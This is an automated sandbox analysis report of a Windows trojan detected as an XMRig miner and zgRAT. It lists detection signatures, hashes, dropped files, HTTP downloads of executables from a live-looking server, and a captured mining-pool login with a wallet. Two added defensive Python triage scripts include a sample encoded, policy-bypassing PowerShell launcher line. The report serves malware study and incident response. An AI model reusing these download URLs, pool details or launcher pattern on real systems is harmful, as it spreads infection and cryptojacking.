Windows Analysis Report
e2kLb2J2Y7.exe

Overview

General Information

Sample Name: e2kLb2J2Y7.exe
Original Sample Name: 506761d4ae9aa7134c001c7f0b7b4827.exe
Analysis ID: 1345583
MD5: 506761d4ae9aa7134c001c7f0b7b4827
SHA1: 45b12d344817ca14e1f630da7f624b2093e7728d
SHA256: 36216f13d2670aadc24589c4810c4ef62e9370a4e3cf05f8015b1beb5e0c4a63
Tags: 64, exe, trojan

Detection

Xmrig, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sigma detected: Xmrig
Writes to foreign memory regions
Yara detected PersistenceViaHiddenTask
Found strings related to Crypto-Mining
Query firmware table information (likely to detect VMs)
Bypasses PowerShell execution policy
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Detected Stratum mining protocol
Suspicious powershell command line found
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Potential dropper URLs found in powershell memory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates COM task schedule object (often to register a task for autostart)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Name: zgRAT
Description: zgRAT is a Remote Access Trojan which sometimes drops other malware such as AgentTesla. zgRAT has an infostealer function that targets browser information and cryptocurrency wallets. It usually spreads via USB or phishing emails with .zip/.lnk/.bat/.xlsx attachments and similar.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

AV Detection

Source: e2kLb2J2Y7.exe ReversingLabs: Detection: 57%
Source: e2kLb2J2Y7.exe Virustotal: Detection: 63%
Source: e2kLb2J2Y7.exe Avira: detected
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware (caveat: this URL is the IconUri of the Pester PowerShell module that ships with Windows and shows up in powershell.exe memory regardless of the sample; do not treat it as an indicator of this sample)
Source: http://163.123.142.171:8080/file/1699834997-Prvrec.exe Avira URL Cloud: Label: malware
Source: http://163.123.142.171:8080/file/1699834997-Prvrec.exe Virustotal: Detection: 12%
Source: http://163.123.142.171:8080/file/1699833590-plugin3.dll Virustotal: Detection: 7%
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Avira: detection malicious, Label: HEUR/AGEN.1313071
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Avira: detection malicious, Label: HEUR/AGEN.1313071
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Avira: detection malicious, Label: HEUR/AGEN.1313071
Source: C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe Avira: detection malicious, Label: HEUR/AGEN.1313071
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Virustotal: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Virustotal: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe Virustotal: Detection: 63%
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Virustotal: Detection: 65%
Source: e2kLb2J2Y7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe Joe Sandbox ML: detected

Bitcoin Miner

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 19.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2395730311.00000001404B1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2395730311.00000001407AE000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AddInProcess.exe PID: 7648, type: MEMORYSTR
Source: AddInProcess.exe, 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: stratum+ssl://randomx.xmrig.com:443 (caveat: this is a default pool URL compiled into XMRig's built-in configuration, not evidence of the pool in use; the pool this sample actually logs in to is the one in the captured Stratum traffic, 163.123.142.171:8383)
Source: AddInProcess.exe, 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: cryptonight/0
Source: AddInProcess.exe, 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: AddInProcess.exe, 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Source: AddInProcess.exe, 00000013.00000002.2395730311.0000000140481000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: XMRig 6.20.0
Source: global traffic TCP traffic: three connections from 192.168.2.6 (source ports 49766, 49769 and 49772) -> 163.123.142.171:8383, each carrying the identical Stratum login payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"44k2hl2woi2893k79nhdxhsdml8vlcccdx5hdn2f3d7fgrukkccqutfnxm5ftkq8skuejncioyxvgnqsrmhuc9qx268crgw.rig_cpu","pass":"x","agent":"xmrig/6.20.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
Note: the report renders payloads case-folded (the real XMRig agent string is "XMRig/6.20.0 (Windows NT 10.0; Win64; x64) ..."), so the 95-character Monero address shown in the login field is not usable verbatim for pool or blockchain lookups; base58 addresses are case-sensitive and the original case must be taken from the raw pcap. The pool endpoint (163.123.142.171:8383, a non-standard port) and the worker name "rig_cpu" are the usable network indicators.
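Added example, not part of the Joe Sandbox report: a small Python triage script that parses Stratum login messages of the form captured above out of TCP payloads and extracts the indicators a responder wants (pool endpoint, wallet, worker name, miner build, algorithm list), flagging XMRig agents, RandomX capability and non-standard pool ports. The captured login is embedded as the first sample flow, exactly as the report renders it (case-folded); the other two flows, the HTTP request reconstructed from the Prvrec.exe URL in the AV Detection section and a Stratum "submit" message, are constructed here to show the filter does not over-match. The COMMON_POOL_PORTS set is an assumption for this example, not a standard.

```python
"""Pull XMRig/Stratum login indicators out of captured TCP payloads.

XMRig speaks newline-delimited JSON-RPC to its pool.  The first client message
is {"method":"login","params":{"login":WALLET[.WORKER],"pass":...,"agent":...,
"algo":[...]}}, which carries everything a responder needs: pool endpoint,
wallet, worker name, miner build and supported algorithms.
"""
import json
import re
from dataclasses import dataclass, field

# Ports public Monero pools commonly advertise.  Assumption for this example:
# a pool on any other port is reported as "non-standard" for triage.
COMMON_POOL_PORTS = {3333, 4444, 5555, 7777, 9000, 443}

# Standard Monero address: 95 chars starting with 4 (main) or 8 (subaddress).
# The sandbox case-folds payloads, so only the shape is checked here; strict
# base58 validation must run on the raw capture.
MONERO_SHAPE = re.compile(r"[48][0-9A-Za-z]{94}")


@dataclass
class StratumLogin:
    src: str
    dst_ip: str
    dst_port: int
    wallet: str
    worker: str
    agent: str
    algos: list = field(default_factory=list)
    indicators: list = field(default_factory=list)


def parse_stratum_login(payload: str):
    """Return the params dict of a Stratum login message, or None.

    raw_decode() stops at the end of the first JSON object, so trailing data
    (the next newline-delimited message, or a stray '.') does not break it.
    """
    start = payload.find("{")
    if start < 0:
        return None
    try:
        msg, _ = json.JSONDecoder().raw_decode(payload[start:])
    except json.JSONDecodeError:
        return None
    if not isinstance(msg, dict) or msg.get("method") != "login":
        return None
    params = msg.get("params")
    if not isinstance(params, dict) or not isinstance(params.get("login"), str):
        return None
    return params


def analyse_flow(flow: dict):
    """Turn one captured flow into a StratumLogin with triage indicators, or None."""
    params = parse_stratum_login(flow["payload"])
    if params is None:
        return None
    wallet, _, worker = params["login"].partition(".")  # XMRig appends ".worker"
    agent = params.get("agent", "")
    algos = [a for a in params.get("algo", []) if isinstance(a, str)]
    ind = []
    if flow["dst_port"] not in COMMON_POOL_PORTS:
        ind.append(f"non-standard pool port {flow['dst_port']}")
    if "xmrig" in agent.lower():
        ind.append("XMRig user agent")
    if "rx/0" in algos:
        ind.append("RandomX (Monero) capable")
    if MONERO_SHAPE.fullmatch(wallet):
        ind.append("Monero-style wallet in login")
    return StratumLogin(flow["src"], flow["dst_ip"], flow["dst_port"],
                        wallet, worker, agent, algos, ind)


def scan_flows(flows):
    """Return a StratumLogin for every flow that starts with a Stratum login."""
    return [r for r in (analyse_flow(f) for f in flows) if r is not None]


# The login captured in this report, rebuilt as the miner sent it (newline-delimited).
_LOGIN = json.dumps({
    "id": 1, "jsonrpc": "2.0", "method": "login",
    "params": {
        "login": "44k2hl2woi2893k79nhdxhsdml8vlcccdx5hdn2f3d7fgrukkccqutfnxm5ftkq8skuejncioyxvgnqsrmhuc9qx268crgw.rig_cpu",
        "pass": "x",
        "agent": "xmrig/6.20.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019",
        "algo": ["rx/0", "cn/2", "cn/r", "cn/fast", "cn/half", "cn/xao", "cn/rto", "cn/rwz",
                 "cn/zls", "cn/double", "cn/ccx", "cn-lite/1", "cn-heavy/0", "cn-heavy/tube",
                 "cn-heavy/xhv", "cn-pico", "cn-pico/tlo", "cn/upx2", "cn/1", "rx/wow", "rx/arq",
                 "rx/graft", "rx/sfx", "rx/keva", "argon2/chukwa", "argon2/chukwav2",
                 "argon2/ninja", "ghostrider"],
    },
}, separators=(",", ":")) + "\n"

# Constructed sample flows: the captured login plus two non-login flows.
SAMPLE_FLOWS = [
    {"src": "192.168.2.6:49766", "dst_ip": "163.123.142.171", "dst_port": 8383, "payload": _LOGIN},
    {"src": "192.168.2.6:49801", "dst_ip": "163.123.142.171", "dst_port": 8080,
     "payload": "GET /file/1699834997-Prvrec.exe HTTP/1.1\r\nHost: 163.123.142.171:8080\r\n\r\n"},
    {"src": "192.168.2.6:49810", "dst_ip": "10.0.0.5", "dst_port": 8383,
     "payload": '{"id":2,"jsonrpc":"2.0","method":"submit","params":{"id":"abc"}}\n'},
]

if __name__ == "__main__":
    for hit in scan_flows(SAMPLE_FLOWS):
        print(f"{hit.src} -> {hit.dst_ip}:{hit.dst_port} wallet={hit.wallet} worker={hit.worker}")
        print(f"  agent={hit.agent}\n  algos={len(hit.algos)} indicators={hit.indicators}")
```

Feed it the payloads of each TCP stream's first client packet (for example from a pcap via scapy or tshark -T fields) and pivot on the pool endpoint plus wallet: the pool port and IP change between campaigns, the wallet rarely does.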
Source: e2kLb2J2Y7.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Vchwz.pdb source: e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2112901867.00000000034C0000.00000004.08000000.00040000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013D32000.00000004.00000800.00020000.00000000.sdmp, Key.exe, 00000004.00000002.2165294330.0000000014288000.00000004.00000800.00020000.00000000.sdmp, zhtyxulkfny.exe, 00000011.00000002.3066172573.0000000013A98000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Ndubaw.pdb source: xddtyli.exe, 00000009.00000002.2371258222.000001EEB7365000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2709105744.000001EEBF780000.00000004.08000000.00040000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB753D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 2.TaskScheduler.pdb source: xddtyli.exe, 00000009.00000002.2371258222.000001EEB7975000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.000000001411F000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2119559913.000000001D5D0000.00000004.08000000.00040000.00000000.sdmp, Key.exe, 00000004.00000002.2152846444.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, Values.exe, 0000000C.00000002.2630079192.0000023277D83000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 2.TaskScheduler.pdbSHA256e source: xddtyli.exe, 00000009.00000002.2371258222.000001EEB7975000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.000000001411F000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2119559913.000000001D5D0000.00000004.08000000.00040000.00000000.sdmp, Key.exe, 00000004.00000002.2152846444.00000000042BC000.00000004.00000800.00020000.00000000.sdmp, Values.exe, 0000000C.00000002.2630079192.0000023277D83000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: e2kLb2J2Y7.exe, 00000000.00000002.2118028441.000000001C660000.00000004.08000000.00040000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7893000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7845000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: e2kLb2J2Y7.exe, 00000000.00000002.2118028441.000000001C660000.00000004.08000000.00040000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7893000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7845000.00000004.00000800.00020000.00000000.sdmp
Source: COM class lookups for CLSID {0F87369F-A4E5-4CFC-BD3E-73E6154572DD}, which is CLSID_TaskScheduler, the Task Scheduler service object used by the embedded Microsoft.Win32.TaskScheduler library (see the "Creates COM task schedule object" signature). The keys below are the normal COM activation lookup for that class. The same set of keys was opened, in the same order, by each of these five processes:
    C:\Users\user\Desktop\e2kLb2J2Y7.exe
    C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
    C:\Users\user\AppData\Local\Temp\xddtyli.exe
    C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe
Keys opened by each process (repeated opens of the same key are collapsed):
    HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
    HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
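Added example, not from the report or the sample: the Task Scheduler COM lookups above, together with the "Yara detected PersistenceViaHiddenTask" signature, point at a task registered with the Hidden setting, which the Task Scheduler UI does not list. Tasks registered through that COM service are persisted as XML under C:\Windows\System32\Tasks, so a responder can triage them by reading the XML directly. The Python below parses task definitions and flags the combination of Hidden=true, a command in a user-writable directory, PowerShell launched with encoded or policy-bypass flags, and logon/boot triggers. The report does not show the task definition this sample created, so the three task XML documents embedded here are constructed, with hypothetical task names and paths; the USER_WRITABLE and PS_SUSPICIOUS lists are assumptions for this example.

```python
"""Triage Windows scheduled-task definitions for hidden persistence.

Tasks registered via the Task Scheduler COM service are stored as XML files
under C:\\Windows\\System32\\Tasks (UTF-16 with BOM).  A task whose <Hidden>
setting is true is not shown in the Task Scheduler UI, so read the XML.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from pathlib import Path

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Assumptions for this example: directories an unprivileged user can write to,
# and PowerShell switches that signal an encoded or policy-bypassing launcher.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
PS_SUSPICIOUS = ("-enc", "-encodedcommand", "bypass", "hidden")


@dataclass
class TaskFinding:
    name: str
    command: str
    arguments: str
    hidden: bool
    triggers: list = field(default_factory=list)
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def triage_task_xml(name: str, xml_text: str) -> TaskFinding:
    """Parse one task definition and attach the reasons it looks like persistence."""
    root = ET.fromstring(xml_text)
    hidden = (root.findtext("t:Settings/t:Hidden", default="false", namespaces=NS) or "").strip().lower() == "true"
    command = (root.findtext("t:Actions/t:Exec/t:Command", default="", namespaces=NS) or "").strip()
    arguments = (root.findtext("t:Actions/t:Exec/t:Arguments", default="", namespaces=NS) or "").strip()
    triggers_el = root.find("t:Triggers", NS)
    # Child tags are namespaced ("{ns}LogonTrigger"); keep only the local name.
    triggers = [c.tag.split("}")[-1] for c in triggers_el] if triggers_el is not None else []
    f = TaskFinding(name, command, arguments, hidden, triggers)
    cmd, args = command.lower(), arguments.lower()
    if hidden:
        f.reasons.append("Hidden=true (not listed in the Task Scheduler UI)")
    if any(d in cmd for d in USER_WRITABLE):
        f.reasons.append("command in user-writable directory")
    if "powershell" in cmd and any(flag in args for flag in PS_SUSPICIOUS):
        f.reasons.append("PowerShell with encoded/bypass/hidden flags")
    if f.reasons and any(t in ("LogonTrigger", "BootTrigger") for t in triggers):
        f.reasons.append("runs at logon/boot")
    return f


def triage_task_file(path) -> TaskFinding:
    """Read a task file from disk; on-disk files are UTF-16 with BOM, exports may be UTF-8."""
    raw = Path(path).read_bytes()
    enc = "utf-16" if raw[:2] in (b"\xff\xfe", b"\xfe\xff") else "utf-8-sig"
    return triage_task_xml(Path(path).name, raw.decode(enc))


def triage_tasks(tasks: dict) -> list:
    """Return only the suspicious findings from a {task name: xml text} mapping."""
    return [f for f in (triage_task_xml(n, x) for n, x in tasks.items()) if f.suspicious]


# Constructed task definitions (hypothetical names and paths, not from the report).
SAMPLE_TASKS = {
    "ExampleCleanup": """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2023-01-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>C:\\Windows\\System32\\cleanmgr.exe</Command><Arguments>/autoclean</Arguments></Exec></Actions>
</Task>""",
    "ExampleUpdater": """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Settings><Hidden>true</Hidden><StartWhenAvailable>true</StartWhenAvailable></Settings>
  <Actions Context="Author"><Exec><Command>C:\\Users\\user\\AppData\\Roaming\\Example\\update.exe</Command></Exec></Actions>
</Task>""",
    "Loader": """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><BootTrigger/></Triggers>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>powershell.exe</Command><Arguments>-ep bypass -w hidden -enc SQBFAFgA</Arguments></Exec></Actions>
</Task>""",
}

if __name__ == "__main__":
    for f in triage_tasks(SAMPLE_TASKS):
        print(f"{f.name}: {f.command} {f.arguments}\n  triggers={f.triggers}\n  reasons={f.reasons}")
```

On a live host or a mounted image, walk C:\Windows\System32\Tasks and call triage_task_file on every file; pair the result with the registry copies under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache, since a task whose XML has been deleted from disk may still be present in TaskCache.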

Networking

Source: powershell.exe, 00000002.00000002.2179820229.0000029DD41C9000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
Source: powershell.exe, 00000002.00000002.2179820229.0000029DD41C9000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
Source: powershell.exe, 00000002.00000002.2179820229.0000029DD41C9000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
Source: powershell.exe, 0000000A.00000002.2334928126.00000237255F9000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
Source: Joe Sandbox View ASN Name: ILIGHT-NETUS ILIGHT-NETUS
Source: global traffic HTTP traffic detected: GET /file/1699834997-Prvrec.exe HTTP/1.1 Host: 163.123.142.171:8080 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /file/1699835572-explorer.exe HTTP/1.1 Host: 163.123.142.171:8080 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /file/1699833590-plugin3.dll HTTP/1.1 Host: 163.123.142.171:8080
Source: Joe Sandbox View IP Address: 163.123.142.171 163.123.142.171
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Disposition: attachment; filename*=UTF-8''1699834997-Prvrec.exe Content-Length: 643072 Content-Type: application/octet-stream Last-Modified: Mon, 13 Nov 2023 00:23:17 GMT Date: Tue, 21 Nov 2023 03:47:05 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Disposition: attachment; filename*=UTF-8''1699835572-explorer.exe Content-Length: 604672 Content-Type: application/octet-stream Last-Modified: Mon, 13 Nov 2023 00:32:52 GMT Date: Tue, 21 Nov 2023 03:47:18 GMT
Source: global traffic TCP traffic: 192.168.2.6:49709 -> 91.92.244.36:58001
Source: global traffic TCP traffic: 192.168.2.6:49710 -> 163.123.142.171:8080
Source: unknown TCP traffic detected without corresponding DNS query: 91.92.244.36
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: powershell.exe, 00000002.00000002.2491503196.0000029DE4013000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2646332508.00000270D6774000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3527531392.0000023735444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.2334928126.00000237255F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: xddtyli.exe, 00000009.00000002.2809050609.000001EEBF9C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.m
Source: xddtyli.exe, 00000009.00000002.2975467324.000001EEBFD70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.microsoft
Source: powershell.exe, 00000002.00000002.2179820229.0000029DD41C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2185219246.00000270C6928000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2334928126.00000237255F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: e2kLb2J2Y7.exe, 00000000.00000002.2113076611.0000000003A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2179820229.0000029DD3FA1000.00000004.00000800.00020000.00000000.sdmp, Key.exe, 00000004.00000002.2152846444.0000000003D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2185219246.00000270C6701000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2278949383.000001EEA73F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2334928126.00000237253D1000.00000004.00000800.00020000.00000000.sdmp, zhtyxulkfny.exe, 00000011.00000002.2754160353.00000000036AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
